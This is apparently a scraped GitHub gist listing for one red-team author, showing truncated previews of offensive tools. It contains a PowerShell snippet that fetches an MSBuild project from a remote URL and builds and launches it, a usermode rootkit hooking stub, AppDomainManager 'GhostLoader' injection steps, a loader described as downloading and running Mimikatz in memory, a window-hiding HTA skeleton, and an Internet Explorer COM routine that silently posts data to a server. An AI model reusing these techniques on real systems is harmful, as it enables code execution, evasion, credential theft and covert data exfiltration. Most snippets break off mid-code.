@leoloobeek
leoloobeek / JScriptToDotnet.js
Created November 28, 2018 18:50
Sample Extract Payload DotNetToJScript
//Base64 Raw Decoder
function Base64Decode(str) {
if (!(/^[a-z0-9+/]+={0,2}$/i.test(str)) || str.length%4 != 0) throw Error('Not base64 string');
var b64 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
var o1, o2, o3, h1, h2, h3, h4, bits, d=[];
for (var c=0; c<str.length; c+=4) { // unpack four hexets into three octets
After a little more research, the 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Convert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
- Launch program (payload)
In-memory PowerShell XSLT project build:
[Reflection.Assembly]::LoadWithPartialName('Microsoft.Build');
$proj = [System.Xml.XmlReader]::create("https://gist.githubusercontent.com/caseysmithrc/8e58d11bc99e496a19424fbe5a99175f/raw/38256d70b414f6678005366efc86009c562948c6/xslt2.proj")
$e=new-object Microsoft.Build.Evaluation.Project($proj);
$e.build();
@leoloobeek
leoloobeek / Injectable.cpp
Created December 19, 2017 18:37 — forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW;
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
@leoloobeek
leoloobeek / Numbers.Xml
Created March 8, 2018 16:31
XSLT C# Examples
<?xml version='1.0'?>
<data>
<circle>
<radius>12</radius>
</circle>
<circle>
<radius>37.5</radius>
</circle>
</data>
@leoloobeek
leoloobeek / get_gists.py
Created April 26, 2017 21:34
Download all gists for a specific user
# first: mkdir user && cd user && cp /path/to/get_gists.py .
# python3 get_gists.py user
import requests
import sys
from subprocess import call
user = sys.argv[1]
r = requests.get('https://api.github.com/users/{0}/gists'.format(user))
@leoloobeek
leoloobeek / _Instructions_Reproduce.md
Created April 29, 2020 11:53
GhostLoader - AppDomainManager - Injection - Ghost in the Shell

GhostLoader Steps :)

1. Create C:\Tools
2. Copy Some .NET, any .NET binary to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
@leoloobeek
leoloobeek / netkatz.cs
Last active September 19, 2023 16:24
Downloads and Executes Mimikatz In Memory From GitHub
using System;
using System.IO;
using System.Net;
using System.Text;
using System.IO.Compression;
using System.Collections.Generic;
using System.Configuration.Install;
using System.Runtime.InteropServices;
@leoloobeek
leoloobeek / example.hta
Last active July 24, 2023 00:39
HTA example for
<html>
<head>
<script language="JScript">
// HTA skeleton taken from https://github.com/zerosum0x0/koadic
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
{
@leoloobeek
leoloobeek / ie_com.cs
Last active July 21, 2023 13:07
InternetExplorer.Application PoC's
// sample function that takes in a destination server, POST data, and custom HTTP request headers
private string SendData(string dst, byte[] postData, string customHeaders)
{
Type com_type = Type.GetTypeFromCLSID(new Guid("0002DF01-0000-0000-C000-000000000046"));
object IE = Activator.CreateInstance(com_type);
object[] falseArr = new object[] { false };
object[] trueArr = new object[] { true };
com_type.InvokeMember("Visible", System.Reflection.BindingFlags.SetProperty, null, IE, falseArr);
com_type.InvokeMember("Silent", System.Reflection.BindingFlags.SetProperty, null, IE, trueArr);